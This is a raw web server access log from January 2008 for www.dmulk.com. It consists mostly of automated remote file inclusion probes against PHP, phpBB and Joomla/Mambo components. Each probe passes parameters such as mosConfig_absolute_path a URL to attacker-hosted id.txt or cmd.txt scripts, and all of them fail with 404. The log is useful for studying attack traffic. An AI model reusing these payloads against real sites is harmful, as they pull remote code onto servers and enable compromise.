216.136.66.5 - - [26/Jan/2008:05:08:23 -0800] "GET /logs/access_080106.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:08:23 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:08:23 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:08:24 -0800] "GET /logs/access_080101.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:09:26 -0800] "GET /logs/access_080106.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:09:26 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:09:26 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:09:27 -0800] "GET /logs/access_080101.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:09:28 -0800] "GET /logs/access_080106.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:09:28 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:09:28 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:09:28 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:09:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:09:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:09:29 -0800] "GET /logs/access_080101.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.90.29 - - [26/Jan/2008:05:10:24 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowking123/cmd.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
83.149.90.29 - - [26/Jan/2008:05:10:24 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowking123/cmd.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:05:11:19 -0800] "GET /logs/access_071230.log//index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:05:11:19 -0800] "GET //index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:05:11:20 -0800] "GET /logs//index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:12:28 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:05:12:44 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:05:12:44 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:05:12:44 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.17 - - [26/Jan/2008:05:12:55 -0800] "GET /logs/access_071021.log HTTP/1.0" 200 17408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:12:57 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:05:12:59 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:05:13:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:13:44 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.104.2 - - [26/Jan/2008:05:14:06 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.104.2 - - [26/Jan/2008:05:14:06 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.104.2 - - [26/Jan/2008:05:14:07 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lurejewelry.com/12all/admin/images/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:05:17:13 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:17:43 -0800] "GET /logs/access_071225.log//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:17:43 -0800] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:17:43 -0800] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:18:01 -0800] "GET /logs/access_071225.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:18:01 -0800] "GET //cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:18:01 -0800] "GET /logs//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:18:15 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:05:19:11 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:05:19:11 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:05:19:11 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:20:18 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:20:18 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:05:20:18 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:20:22 -0800] "GET /logs/access_071225.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:20:22 -0800] "GET /logs/access_071225.log//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:20:22 -0800] "GET //cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:20:22 -0800] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:20:23 -0800] "GET /logs//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:20:23 -0800] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:05:20:24 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.193.55 - - [26/Jan/2008:05:20:27 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.75.193.55 - - [26/Jan/2008:05:20:27 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:20:42 -0800] "GET /logs/access_071225.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:20:43 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [26/Jan/2008:05:20:43 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:20:43 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:20:52 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:20:52 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:20:53 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:05:22:00 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:05:22:00 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:05:22:00 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:22:01 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:22:01 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:22:01 -0800] "GET /logs/access_080106.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:05:22:01 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.203.14.92 - - [26/Jan/2008:05:22:37 -0800] "GET /logs/errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.203.14.92 - - [26/Jan/2008:05:22:41 -0800] "GET /errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:05:22:50 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:05:22:50 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:05:22:51 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:23:09 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:23:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:23:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:23:19 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:23:19 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:23:19 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:23:30 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:23:37 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.229.24.97 - - [26/Jan/2008:05:24:32 -0800] "GET /logs/access_071225.log//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.24.97 - - [26/Jan/2008:05:24:32 -0800] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.24.97 - - [26/Jan/2008:05:24:33 -0800] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:05:24:49 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.129.109 - - [26/Jan/2008:05:25:00 -0800] "GET /logs/access_071225.log//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.129.109 - - [26/Jan/2008:05:25:00 -0800] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.129.109 - - [26/Jan/2008:05:25:00 -0800] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:25:13 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:25:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:25:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:25:54 -0800] "GET /logs/access_071225.log//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:25:54 -0800] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:25:55 -0800] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:26:29 -0800] "GET /logs/access_071225.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:26:30 -0800] "GET //cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:26:30 -0800] "GET /logs//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:05:26:58 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:27:28 -0800] "GET /logs/access_080106.log//components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:27:28 -0800] "GET //components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:27:29 -0800] "GET /logs//components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:05:29:42 -0800] "GET //errors.php?error=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:05:29:44 -0800] "GET /logs//errors.php?error=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:05:29:47 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:05:30:13 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.204.11.65 - - [26/Jan/2008:05:30:49 -0800] "GET /logs/access_071225.log//admin.php?include_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.204.11.65 - - [26/Jan/2008:05:30:49 -0800] "GET //admin.php?include_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.204.11.65 - - [26/Jan/2008:05:30:50 -0800] "GET /logs//admin.php?include_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:05:31:48 -0800] "GET /logs/access_080106.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
